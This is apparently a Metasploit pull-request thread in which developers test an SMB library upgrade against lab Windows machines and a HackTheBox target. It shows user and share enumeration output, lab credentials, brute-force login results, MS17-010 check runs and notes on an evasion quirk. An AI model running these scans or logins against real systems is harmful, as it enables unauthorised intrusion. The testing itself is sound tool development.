[+] 192.168.134.109:445   - WIN2016X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.106:445   - WIN1803X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.111:445   - WIN10X86_1709 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
[*] 192.168.134.0/24:     - Scanned 103 of 256 hosts (40% complete)
[+] 192.168.134.117:445   - WIN10X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.115:445   - WIN1709X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.114:445   - WIN10X86_1703 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, defaultuser0, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.118:445   - WIN10X64_1703 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, defaultuser0, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.119:445   - WIN10X86_1803 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.123:445   - WIN8X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.121:445   - WIN10X64_1511 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[*] 192.168.134.0/24:     - Scanned 128 of 256 hosts (50% complete)
[+] 192.168.134.129:445   - WIN10X86 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.132:445   - WIN10X64_1709 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.151:445   - WIN2012X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.146:445   - WIN1809X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.149:445   - WIN10X64_1607 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.156:445   - WIN81X64SP1 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[*] 192.168.134.0/24:     - Scanned 155 of 256 hosts (60% complete)
[+] 192.168.134.164:445   - WIN10X64_1809 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.162:445   - WIN81X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.172:445   - WIN2012R2X64SP1 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.171:445   - WIN81X86 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.177:445   - WIN10X64_1803 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.187:445   - WIN2012R2X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.185:445   - WIN8X86 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.189:445   - WIN81X86SP1 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.191:445   - WIN10X86_1809 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
[*] 192.168.134.0/24:     - Scanned 183 of 256 hosts (71% complete)
[+] 192.168.134.193:445   - WIN10X86_1511 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.192:445   - WIN10X86_1607 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[*] 192.168.134.0/24:     - Scanned 207 of 256 hosts (80% complete)
[*] 192.168.134.0/24:     - Scanned 231 of 256 hosts (90% complete)
[*] 192.168.134.0/24:     - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

Log

[06/12/2020 11:28:26] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:26] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:26] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:26] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:26] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:26] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:26] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:28:26] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:28:26] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:26] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:26] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:28:27] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:28:47] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:47] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:47] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:47] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:47] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:47] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:47] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:28:47] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:47] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:28:47] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:28:47] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:47] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:47] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:47] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:47] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:47] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:28:47] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:28:47] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:47] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:47] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:28:47] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:29:08] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:08] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:08] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:08] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:08] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:29:08] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:29:28] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:28] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:28] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:28] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:28] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:28] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:28] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:29:28] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:29:28] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:29:28] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:28] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:29] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:29:49] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:49] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:49] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:49] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:49] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:29:49] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:29:49] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:49] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:49] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:49] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:49] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:29:49] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:30:09] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:30:09] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:30:09] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:30:09] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:30:09] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:30:09] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:30:09] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:30:09] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:30:10] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:30:10] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:30:10] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:30:10] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:30:10] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:30:10] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:30:10] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:30:30] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:30:30] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:30:30] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:30:30] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:30:30] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:30:30] [d(0)] core: Negotiated SMB version: SMB3

cdelafuente-r7 · 2020-06-12T16:43:12Z

Awesome! Thank you for testing @bwatters-r7 .

Can we reasonably say that no change is needed since the updated version works fine?

bwatters-r7 · 2020-06-12T16:47:38Z

I really dislike the error, even if it might not be on us. Is there any moderately easy way we could be more descriptive or recognize this particular error as a subclass of a reset?
I'm just trying to figure out how we might recognize this instance if someone were to send up the error output and logs.

adfoster-r7 · 2020-06-15T15:33:04Z

I've tested some SMB aux scanner modules. OSX doesn't work for me. Windows works better, but some of the modules don't work as expected for me.

OSX Testing

Target

I set up a local share for this and a new test account for smb sharing

set RHOSTS 127.0.0.1
set SMBUser test
set SMBPass test

This originally gave me:

> run
[-] 127.0.0.1:139         - Error: '127.0.0.1' 'Rex::ConnectionRefused' 'The connection was refused by the remote host (127.0.0.1:139).'
[-] 127.0.0.1:445         - Login Failed: NBSS Header is missing
[*] 127.0.0.1:            - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

With the latest ruby_smb branch that error doesn't occur anymore. However an error denied is received instead:

msf5 auxiliary(scanner/smb/smb_enumshares) > set SMB::ProtocolVersion 1,2
SMB::ProtocolVersion => 1,2
msf5 auxiliary(scanner/smb/smb_enumshares) > run
[-] 127.0.0.1:139         - Error: '127.0.0.1' 'Rex::ConnectionRefused' 'The connection was refused by the remote host (127.0.0.1:139).'
[-] 127.0.0.1:445         - The server responded with an unexpected status code: STATUS_ACCESS_DENIED
[!] 127.0.0.1:445         - peer_native_os is only available with SMB1 (current version: SMB2)
[!] 127.0.0.1:445         - peer_native_lm is only available with SMB1 (current version: SMB2)
[*] 127.0.0.1:445         - No shares collected
[*] 127.0.0.1:            - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Logs:

[06/15/2020 14:28:34] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/15/2020 14:28:34] [d(0)] core: Negotiated SMB version: SMB2

Note that impacket works fine in this scenario.

Windows

Target

Tested on some HTB the boxes. The below reports are from HTB monteverde - smb://SABatchJobs:[email protected]

setg RHOSTS 10.10.10.172
setg SMBUser SABatchJobs
setg SMBPass SABatchJobs

scanner/smb/smb_enumshares

Works as expected:

msf5 auxiliary(scanner/smb/smb_enumshares) > run

[-] 10.10.10.172:139      - Login Failed: Unable to negotiate SMB1 with the remote host: Not a valid SMB packet
[!] 10.10.10.172:445      - peer_native_os is only available with SMB1 (current version: SMB3)
[!] 10.10.10.172:445      - peer_native_lm is only available with SMB1 (current version: SMB3)
[+] 10.10.10.172:445      - ADMIN$ - (DISK) Remote Admin
[+] 10.10.10.172:445      - azure_uploads - (DISK) 
[+] 10.10.10.172:445      - C$ - (DISK) Default share
[+] 10.10.10.172:445      - E$ - (DISK) Default share
[+] 10.10.10.172:445      - IPC$ - (IPC) Remote IPC
[+] 10.10.10.172:445      - NETLOGON - (DISK) Logon server share 
[+] 10.10.10.172:445      - SYSVOL - (DISK) Logon server share 
[+] 10.10.10.172:445      - users$ - (DISK) 
[*] 10.10.10.172:         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

scanner/smb/smb_enumusers

Works as exepcted:

msf5 auxiliary(scanner/smb/smb_enumusers) > run

[+] 10.10.10.172:445      - MEGABANK [ Administrator, Guest, krbtgt, AAD_987d7f2f57d2, mhope, SABatchJobs, svc-ata, svc-bexec, svc-netapp, dgalanos, roleary, smorgan ] ( LockoutTries=0 PasswordMin=7 )
[*] 10.10.10.172:         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

scanner/smb/smb_login

scanner/smb/smb_login doesn't appear to work. I think this is due the SMB domain by default being ..
If you set a blank smd domain entirely it becomes WORKSTATION

msf5 auxiliary(scanner/smb/smb_login) > run

[*] 10.10.10.172:445      - 10.10.10.172:445 - Starting SMB login bruteforce
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\SABatchJobs:SABatchJobs',
[*] 10.10.10.172:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

scanner/smb/smb_version

Doesn't appear to work:

msf5 auxiliary(scanner/smb/smb_version) > run

[*] 10.10.10.172:445      - Force SMB1 since SMB fingerprint needs native_lm/native_os information
[*] 10.10.10.172:445      - Host could not be identified:  ()
[*] 10.10.10.172:445      - Scanned 1 of 1 hosts (100% complete)

Log:

[06/15/2020 13:43:11] [d(0)] core: SMB version(s) to negotiate: [1]
[06/15/2020 13:43:11] [d(0)] core: Error with SMB fingerprint: Login Failed: Connection reset by peer

smb_checks.rc

Currently broken due to smb login above:

> resource ./scripts/resource/smb_checks.rc
[*] Processing /Users/user/Documents/code/metasploit-framework/scripts/resource/smb_checks.rc for ERB directives.
[*] resource (/Users/user/Documents/code/metasploit-framework/scripts/resource/smb_checks.rc)> Ruby Code (3070 bytes)
verbose => true
[*] Performing checks...
[*] Number of hosts to check: 1
[*] Checking 10.10.10.172:445 (microsoft-ds)
[*] Checking SMBv1 on 10.10.10.172
[*] SMBv1 check job ID for target 10.10.10.172 is: 3
[*] Checking MS17-010 on 10.10.10.172
[*] MS17-010 job ID for target 10.10.10.172 is: 4
[*] Checking MS08-067 on 10.10.10.172
[*] MS08-067 job ID for target 10.10.10.172 is: 5

[-] 10.10.10.172:445      - An SMB Login Error occurred while connecting to the IPC$ tree.
[*] 10.10.10.172:445      - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.10.172:445      - Scanned 1 of 1 hosts (100% complete)

cdelafuente-r7 · 2020-06-16T17:02:17Z

@adfoster-r7, thanks for testing again, really appreciated.

It looks like it is also broken on MSF master branch. I tracked down the issue and had to update this:

SimpleClient#create_pipe set the default perm parameter to c (here), which gets translated to the FILE_OPEN_IF disposition. This defines which action the server must take when opening the file: Open the file if it already exists; otherwise, create the file. According to the specs, this filed is ignored for pipes:

For opening named pipes, this field can be set to any value by the client and MUST be ignored by the server.

However, it appears that Mac OS X cares about it and fails with STATUS_ACCESS_DENIED if it is not FILE_OPEN disposition (If the file already exists, return success; otherwise, fail the operation). IMHO, it makes sense for named pipes, but it does not follow the specs.

Even fixing this, an other issue in the write request will break this module. The Offset field of the WriteRequest is set to a random value in Rex::Proto::DCERPC::Client#write here. This is strictly prohibited by the protocol here (Offset field)

If the write is being executed on a pipe, the Offset MUST be set to 0 by the client and MUST be ignored by the server

However, Windows just ignores it, but Mac OS X follows the specs and fails with STATUS_INVALID_PARAMETER. This offset value is probably there as an evasion technique. I think we can remove this and have Mac OS X support again.

So, I will update these two things, unless someone is against it.

Regarding scanner/smb/smb_login, I couldn't reproduce the error you got:

msf5 auxiliary(scanner/smb/smb_login) > run

[*] 18.222.1.100:445     - 18.222.93.100:445 - Starting SMB login bruteforce
[+] 18.222.1.100:445     - 18.222.93.100:445 - Success: '.\smbtest:123456' Administrator
[*] Scanned 1 of 4 hosts (25% complete)
[*] 3.22.209.2:445      - 3.22.209.212:445 - Starting SMB login bruteforce
[+] 3.22.209.2:445      - 3.22.209.212:445 - Success: '.\smbtest:123456' Administrator
[*] Scanned 2 of 4 hosts (50% complete)
[*] 13.59.233.3:445     - 13.59.233.107:445 - Starting SMB login bruteforce
[+] 13.59.233.3:445     - 13.59.233.107:445 - Success: '.\smbtest:123456' Administrator
[*] Scanned 3 of 4 hosts (75% complete)
[*] 13.59.233.4:445      - 13.59.233.94:445 - Starting SMB login bruteforce
[+] 13.59.233.4:445      - 13.59.233.94:445 - Success: '.\smbtest:123456' Administrator
[*] Scanned 4 of 4 hosts (100% complete)
[*] Auxiliary module execution completed

When no domain is used (local user), it is substituted by .. According to the specs, the domain field cannot be empty.

Regarding scanner/smb/smb_version, it needs SMBv1 to work properly. The host your testing has probably SMBv1 disabled.

- Update the SimpleClient#create_pipe permission from 'c' (FILE_OPEN_IF disposition: Open the file if it already exists; otherwise, create the file) to 'o' (FILE_OPEN disposition: If the file already exists, return success; otherwise, fail the operation). - Remove the random offset in Rex::Proto::DCERPC::Client#write (evasion). This is strictly prohibited by the protocol and break on MAC OS X

adfoster-r7 · 2020-06-17T09:12:46Z

metasploit-framework.gemspec

@@ -136,7 +136,7 @@ Gem::Specification.new do |spec|
  spec.add_runtime_dependency 'net-ssh'
  spec.add_runtime_dependency 'ed25519' # Adds ed25519 keys for net-ssh
  spec.add_runtime_dependency 'bcrypt_pbkdf'
-  spec.add_runtime_dependency 'ruby_smb', '~> 1.1'
+  spec.add_runtime_dependency 'ruby_smb', '~> 2.0'


Does Gemfile.lock need updated too? 🤔

Yes, absolutely. When this PR gets merged, we will release a new version of ruby_smb and I will update the gemspec file.

Done! ruby_smb version 2.0.1 has been released and incorporates the referenced changes.

cdelafuente-r7 · 2020-06-17T11:09:38Z

@bwatters-r7, @adfoster-r7, I pushed some ruby_smb updates here to address the issues you reported. Once it is merged, we will release a new version of ruby_smb and include it into MSF.

Thanks again for all the testing you've done!

adfoster-r7 · 2020-06-17T13:37:02Z

OSX share enumeration works for me now 🎉

Just testing some additional SMB module, everything seems pretty good to me

WIndows testing

admin/smb/check_dir_file

Works as expected

set RHOSTS 10.10.10.172
set SMBUser SABatchJobs
set SMBPass SABatchJobs
set SMBSHARE users$
set RPATH mhope

msf5 auxiliary(admin/smb/check_dir_file) > options

Module options (auxiliary/admin/smb/check_dir_file):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS     10.10.10.172     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPATH      MEGABANK.LOCAL   yes       The name of the remote file/directory relative to the share
   RPORT      445              yes       The SMB service port (TCP)
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass    SABatchJobs      no        The password for the specified username
   SMBSHARE   SYSVOL           yes       The name of an accessible share on the server
   SMBUser    SABatchJobs      no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads (max one per host)

msf5 auxiliary(admin/smb/check_dir_file) > run

[*] 10.10.10.172:445      - Connecting to the server...
[*] 10.10.10.172:445      - Mounting the remote share \\10.10.10.172\SYSVOL'...
[*] 10.10.10.172:445      - Checking for file/folder MEGABANK.LOCAL...
[+] 10.10.10.172:445      - Directory FOUND: \\10.10.10.172\SYSVOL\MEGABANK.LOCAL
[*] 10.10.10.172:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Log:

[06/17/2020 13:36:43] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/17/2020 13:36:43] [d(0)] core: Negotiated SMB version: SMB3

admin/smb/download_file

With a folder

set RHOSTS 10.10.10.172
set SMBUser SABatchJobs
set SMBPass SABatchJobs
set SMBSHARE users$
set RPATH mhope

Correctly handling error scenario:


[*] 10.10.10.172:445      - Connecting...
[*] 10.10.10.172:445      - 10.10.10.172:445     : Mounting the remote share \\10.10.10.172\users$'...
[*] 10.10.10.172:445      - Trying to download mhope...
[*] 10.10.10.172:445      - Error: 10.10.10.172: RubySMB::Error::UnexpectedStatusCode The server responded with an unexpected status code: STATUS_FILE_IS_A_DIRECTORY
[*] 10.10.10.172:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Correctly handled error logs:

[06/17/2020 13:38:53] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/17/2020 13:38:54] [d(0)] core: Negotiated SMB version: SMB3
[06/17/2020 13:38:54] [e(0)] core: Error running against host 10.10.10.172: The server responded with an unexpected status code: STATUS_FILE_IS_A_DIRECTORY
/Users/adfoster/.rvm/gems/ruby-2.6.6@metasploit-framework/bundler/gems/ruby_smb-183d47aae4c4/lib/ruby_smb/smb2/tree.rb:116:in `open_file'
/Users/adfoster/.rvm/gems/ruby-2.6.6@metasploit-framework/bundler/gems/ruby_smb-183d47aae4c4/lib/ruby_smb/client/utils.rb:28:in `open'
/Users/adfoster/Documents/code/metasploit-framework/lib/rex/proto/smb/simpleclient.rb:216:in `open'
/Users/adfoster/Documents/code/metasploit-framework/modules/auxiliary/admin/smb/download_file.rb:48:in `block in smb_download'
/Users/adfoster/Documents/code/metasploit-framework/modules/auxiliary/admin/smb/download_file.rb:43:in `each'
/Users/adfoster/Documents/code/metasploit-framework/modules/auxiliary/admin/smb/download_file.rb:43:in `smb_download'
